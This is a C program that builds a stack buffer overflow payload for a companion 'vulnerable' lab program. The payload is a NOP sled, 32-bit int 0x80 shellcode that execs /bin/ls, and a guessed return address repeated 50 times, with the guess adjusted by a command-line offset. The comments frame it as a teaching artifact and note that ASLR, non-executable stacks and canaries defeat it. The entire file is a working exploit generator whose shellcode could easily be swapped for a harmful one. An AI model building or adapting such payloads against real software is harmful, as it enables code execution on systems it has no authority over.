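#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Generates the byte string that overflows the buffer in the companion
 * program "vulnerable" so that its saved return address is overwritten with
 * a guessed address inside this payload, which then runs /bin/ls.
 *
 * Layout of what is written to stdout:
 *   [pgm   : NOP sled (0x90) + shellcode + "/bin/ls" + padding]
 *   [target: the guessed return address, repeated RET_COPIES times]
 *
 * The technique relies on a fixed, executable stack at a known address on a
 * 32-bit target (the payload appears to use the int 0x80 syscall convention).
 * Address-space randomisation, a non-executable stack or stack canaries on
 * the target make the guessed address, and hence the payload, ineffective;
 * this is a lab artifact for a deliberately vulnerable program.
 */

enum { RET_COPIES = 50 };   /* how many times the return address is repeated */

/*
 * NOP sled followed by the shellcode and the "/bin/ls" path it references.
 * NOTE: there is no trailing NUL byte, so strlen() on this array reads past
 * its end (undefined behaviour); always use sizeof pgm for its length.
 */
static const unsigned char pgm[] = {
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    0x31, 0xc9, 0x51, 0xeb, 0x1b, 0x58, 0x88, 0x48,
    0x07, 0x89, 0x40, 0x08, 0x89, 0x48, 0x0c, 0x8d,
    0x58, 0x08, 0x53, 0x50, 0x31, 0xc0, 0xb0, 0x3b,
    0x50, 0xcd, 0x80, 0x83, 0xc4, 0x0c, 0xc9, 0xc3,
    0xe8, 0xe0, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69,
    0x6e, 0x2f, 0x6c, 0x73, 0x01, 0x01, 0x01, 0x01,
    0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01
};

/*
 * Guess of the new return address. This value depends on the target program
 * and environment; the command-line argument is added to it as an offset.
 * Earlier guesses kept for reference: 0xbfffd1e8, 0xbffff8f4.
 */
static unsigned int target = 0xbfbfd238;

/*
 * Usage: <program> OFFSET
 *
 * OFFSET is a decimal integer (may be negative) added to `target`. The
 * assembled payload is written to stdout; diagnostics go to stderr so they
 * never get mixed into the payload stream.
 *
 * Returns 0 on success, EXIT_FAILURE on bad arguments or a failed write.
 */
int main(int argc, char **argv)
{
    /* Sized exactly for the payload, so no write can exceed the buffer. */
    unsigned char bigbuff[sizeof pgm + RET_COPIES * sizeof target];
    const size_t n = sizeof pgm;               /* not strlen(): pgm has no NUL */
    const size_t total = sizeof bigbuff;

    if (argc != 2) {
        fprintf(stderr, "Error - need an offset\n");
        return EXIT_FAILURE;
    }

    /* strtol instead of atoi so that garbage is rejected rather than read as 0. */
    errno = 0;
    char *end = NULL;
    long off = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || errno == ERANGE) {
        fprintf(stderr, "Error - offset must be a decimal integer\n");
        return EXIT_FAILURE;
    }
    /* Unsigned wrap-around is intended: negative offsets move the guess down. */
    target += (unsigned int)off;

    memcpy(bigbuff, pgm, n);
    for (size_t i = 0; i < RET_COPIES; i++) {
        /* Host byte order; assumes the host matches the 32-bit target's
         * endianness — confirm when cross-building. */
        memcpy(bigbuff + n + i * sizeof target, &target, sizeof target);
    }

    /* write() may transfer fewer bytes than requested; loop until complete. */
    size_t done = 0;
    while (done < total) {
        ssize_t w = write(STDOUT_FILENO, bigbuff + done, total - done);
        if (w < 0) {
            if (errno == EINTR) {
                continue;
            }
            perror("write");
            return EXIT_FAILURE;
        }
        done += (size_t)w;
    }
    return 0;
}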